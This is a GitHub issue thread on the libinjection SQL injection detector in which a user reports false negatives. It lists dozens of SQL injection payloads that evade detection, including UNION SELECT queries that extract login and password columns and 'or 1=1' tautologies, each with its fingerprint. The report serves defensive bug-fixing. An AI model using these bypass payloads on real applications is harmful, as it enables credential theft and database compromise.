search

client9 / libinjection

SQL / SQLI tokenizer parser analyzer
Other
1k stars 274 forks source link

Couple false negatives #130

Open migolovanov opened 7 years ago

migolovanov commented 7 years ago

Hello! These two payloads are not detected by libinjection

' + 1<@. union select 1,2,login,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from users limit 1 -- 1
' + 1<@ union select 1,2,login,password,5,6,7,8,9,10,11,12,13,14,15,16,17 from users limit 1 -- 1
migolovanov commented 7 years ago

I think, i have found couple more Query: select * from users where id={payload} Fingerprint &1o.U, Payload: or 1<@. union select 1,version()# Fingerprint &1oUE, Payload: or 1.<@ union select 1,version()# Fingerprint &vo.U, Payload: or @<@. union select 1,version()# Fingerprint &voUE, Payload: or !@<@ union select 1,version()# Fingerprint sns, Payload: or 1<@ union select 'a',version()# Fingerprint: &(1)&, Payload: or (1) or 1=1# Fingerprint: &(v)&, Payload: or (@) or 1=1# Fingerprint: &1o&1, Payload: or 1<@ or 1=1# Fingerprint: &1o.&, Payload: or 1<@. or 1=1# Fingerprint: &1ov&, Payload: or 1%@ or 1=1# Fingerprint: &vo&1, Payload: or @<@ or 1=1# Fingerprint: &vo.&, Payload: or @<@. or 1=1# Fingerprint: 1o&1c, Payload: + 1<@ or 1=1# Fingerprint: 1o.&1, Payload: + 1<@. or 1=1# Fingerprint: s(&1c, Payload: or 1#'( or 1=1# Fingerprint: s(s, Payload: or '(' or 1=1# Fingerprint: s)s, Payload: or ')' or 1=1# Fingerprint: s,&1c, Payload: or 1#', or 1=1# Fingerprint: s.&1c, Payload: or 1#'. or 1=1# Fingerprint: s.s, Payload: or '.' or 1=1# Fingerprint: s1&1c, Payload: or 1#'1 or 1=1# Fingerprint: s1s, Payload: or '1' or 1=1# Fingerprint: sc, Payload: or "#" or 1=1# Fingerprint: sn&1c, Payload: or 1#'a or 1=1# Fingerprint: sns, Payload: or 'a' or 1=1# Fingerprint: sv, Payload: or '@' or 1=1# Fingerprint: sv&1c, Payload: or 1#'@ or 1=1# Fingerprint: s{&1c, Payload: or 1#'{ or 1=1# Fingerprint: s{s, Payload: or '{' or 1=1# Fingerprint: vo&1c, Payload: + @<@ or 1=1# Fingerprint: vo.&1, Payload: + @<@. or 1=1#

Query: select * from users where id='{payload}' Fingerprint s&1o., Payload: ' or 1<@. union select @@version,version()# Fingerprint s&1oU, Payload: ' or 1<@ union select @@version,version()# Fingerprint s&vo., Payload: ' or @<@. union select @@version,version()# Fingerprint s&voU, Payload: ' or @<@ union select @@version,version()# Fingerprint so.UE, Payload: ' + 1<@. union select @@version,version()# Fingerprint soUE1, Payload: ' + 1<@ union select 1,version()# Fingerprint soUEf, Payload: ' + 1<@ union select version(),version()# Fingerprint soUEs, Payload: ' + 1<@ union select 'a',version()# Fingerprint soUEv, Payload: ' + 1<@ union select @@version,version()# Fingerprint: so&1c, Payload: ' + 1<@ or 1=1# Fingerprint: s&1o&, Payload: ' or 1<@ or 1=1# Fingerprint: s&vo&, Payload: ' or @<@ or 1=1# Fingerprint: so&1c, Payload: ' + 1<@ or 1=1# Fingerprint: so.&1, Payload: ' + 1<@. or 1=1# Fingerprint: sUE11, Payload: ' union select 1.$,version()# Fingerprint:sUEsn, Payload: ' union select ''a,version()# Fingerprint: s, Payload: ' union select ""a,version()#

Also i didn't quite understood why ' union select ""a,version()# was considered as s

migolovanov commented 7 years ago

I've checked different databases, there is list of working payloads that were not included in previous post.